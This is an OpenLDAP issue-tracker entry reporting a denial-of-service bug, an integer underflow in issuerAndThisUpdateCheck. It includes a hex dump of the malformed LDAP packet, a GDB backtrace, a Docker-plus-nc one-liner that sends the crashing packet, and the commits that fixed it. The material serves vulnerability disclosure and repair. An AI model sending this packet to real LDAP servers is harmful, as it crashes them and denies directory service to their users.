A malicious packet causes a integer underflow resulting in a crash similarly to ITS#9404 and ITS#9424. Applicable on both 2.4.56 and devel branch Packet: 00000000: 3082 0157 0201 3063 8201 3030 0030 0030 0..W..0c..00.0.0 00000010: 0030 0030 0030 0230 3030 0030 00a0 8201 .0.0.0.000.0.... 00000020: 3030 3030 1d31 2e32 2e38 3236 2e30 2e31 0000.1.2.826.0.1 00000030: 2e33 3334 3438 3130 2e32 2e33 0030 3030 .3344810.2.3.000 00000040: 3030 0482 0100 307f 3030 3030 3030 3030 00....0.00000000 00000050: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 00000060: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 00000070: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 00000080: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 00000090: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 000000a0: 3030 3030 3030 3030 3030 3030 300d 3030 0000000000000.00 000000b0: 3030 3030 3030 3030 3030 30a9 3081 0932 00000000000.0..2 000000c0: 2e35 2e31 332e 3338 8382 0040 7b20 2069 .5.13.38...@{ i 000000d0: 7373 7565 7220 2020 2020 2020 2020 2020 ssuer 000000e0: 2020 2020 2020 2020 2020 2020 2020 2020 000000f0: 2020 2020 2020 2020 2020 2020 2020 2072 r 00000100: 646e 5365 7175 656e 6365 3a22 3030 3030 dnSequence:"0000 00000110: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 00000120: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 00000130: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 00000140: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 00000150: 3030 3030 3030 3030 3030 30 00000000000 GDB output: Program received signal SIGSEGV, Segmentation fault. 0x00005555555e5d5f in issuerAndThisUpdateCheck (in=0x7fffffffd0c0, is=0x7fffffffcf90, tu=0x7fffffffcfa0, ctx=0x5555559a1790) at schema_init.c:3932 3932 if ( is->bv_val[is->bv_len] != '"' ) { (gdb) bt #0 0x00005555555e5d5f in issuerAndThisUpdateCheck (in=0x7fffffffd0c0, is=0x7fffffffcf90, tu=0x7fffffffcfa0, ctx=0x5555559a1790) at schema_init.c:3932 #1 0x00005555555e63a3 in issuerAndThisUpdatePretty (syntax=0x5555557fa700, in=0x7fffffffd0c0, out=0x7fffffffd030, ctx=0x5555559a1790) at schema_init.c:4084 #2 0x00005555555b9395 in asserted_value_validate_normalize (ad=0x0, mr=0x5555557ffdf0, usage=2049, in=0x7fffffffd0c0, out=0x7fffffffd0e8, text=0x7fffffffe490, ctx=0x5555559a1790) at value.c:153 #3 0x0000555555606f76 in get_mra (op=0x5555559a1360, ber=0x555555aa1830, f=0x7fffffffd190, text=0x7fffffffe490) at mra.c:198 #4 0x0000555555598f8a in get_simple_vrFilter (op=0x5555559a1360, ber=0x555555aa1830, filt=0x5555559a18c0, text=0x7fffffffe490) at filter.c:1077 #5 0x0000555555599242 in get_vrFilter (op=0x5555559a1360, ber=0x555555aa1830, vrf=0x5555559a1648, text=0x7fffffffe490) at filter.c:1169 #6 0x00005555555d5d45 in parseValuesReturnFilter (op=0x5555559a1360, rs=0x7fffffffe470, ctrl=0x5555559a1848) at controls.c:1618 #7 0x00005555555d3bab in slap_parse_ctrl (op=0x5555559a1360, rs=0x7fffffffe470, control=0x5555559a1848, text=0x7fffffffe490) at controls.c:737 #8 0x00005555555d437f in get_ctrls2 (op=0x5555559a1360, rs=0x7fffffffe470, sendres=1, ctag=160) at controls.c:928 --Type <RET> for more, q to quit, c to continue without paging-- #9 0x00005555555d3c72 in get_ctrls (op=0x5555559a1360, rs=0x7fffffffe470, sendres=1) at controls.c:767 #10 0x0000555555594c9c in do_search (op=0x5555559a1360, rs=0x7fffffffe470) at search.c:195 #11 0x0000555555591cc0 in connection_operation ( ctx=0x5555557f4280 <ldap_int_main_thrctx>, arg_v=0x5555559a1360) at connection.c:1163 #12 0x00005555555923e9 in connection_read_thread ( ctx=0x5555557f4280 <ldap_int_main_thrctx>, argv=0xa) at connection.c:1318 #13 0x0000555555565c9b in main (argc=1, argv=0x7fffffffe6b8) at fuzzing.c:100 Testing: 1. Launch openldap (Current public repo) docker run -it --net=host bitnami/openldap (More recent develop) docker run -it --net=host phasip/openldap 2. Send crashing packet echo -en '\x30\x82\x01\x57\x02\x01\x30\x63\x82\x01\x30\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x02\x30\x30\x30\x00\x30\x00\xa0\x82\x01\x30\x30\x30\x30\x1d\x31\x2e\x32\x2e\x38\x32\x36\x2e\x30\x2e\x31\x2e\x33\x33\x34\x34\x38\x31\x30\x2e\x32\x2e\x33\x00\x30\x30\x30\x30\x30\x04\x82\x01\x00\x30\x7f\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x0d\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\xa9\x30\x81\x09\x32\x2e\x35\x2e\x31\x33\x2e\x33\x38\x83\x82\x00\x40\x7b\x20\x20\x69\x73\x73\x75\x65\x72\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x6e\x53\x65\x71\x75\x65\x6e\x63\x65\x3a\x22\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30' | nc localhost 1389
fixed in master
trunk: Commits: • 27428b96 by Howard Chu at 2020-12-16T18:52:42+00:00 ITS#9427 fix issuerAndThisUpdateCheck
RE24: Commits: • 91dccd25 by Howard Chu at 2020-12-16T18:56:45+00:00 ITS#9427 fix issuerAndThisUpdateCheck